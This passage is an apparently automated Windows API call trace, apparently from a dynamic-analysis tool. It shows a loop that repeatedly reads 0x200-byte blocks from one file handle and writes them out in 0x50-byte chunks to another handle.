lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.221] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.221] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.222] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.222] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] GetFileType (hFile=0x50) returned 0x1 [0236.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.222] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.223] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.223] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.223] GetFileType (hFile=0x50) returned 0x1 [0236.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] GetFileType (hFile=0x50) returned 0x1 [0236.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.224] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.225] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.225] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.225] GetFileType (hFile=0x50) returned 0x1 [0236.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.226] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.226] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.226] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.227] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.227] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] GetFileType (hFile=0x50) returned 0x1 [0236.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.227] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.228] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.228] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] GetFileType (hFile=0x50) returned 0x1 [0236.228] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.228] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] GetFileType (hFile=0x50) returned 0x1 [0236.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.229] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.229] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.229] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.230] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, 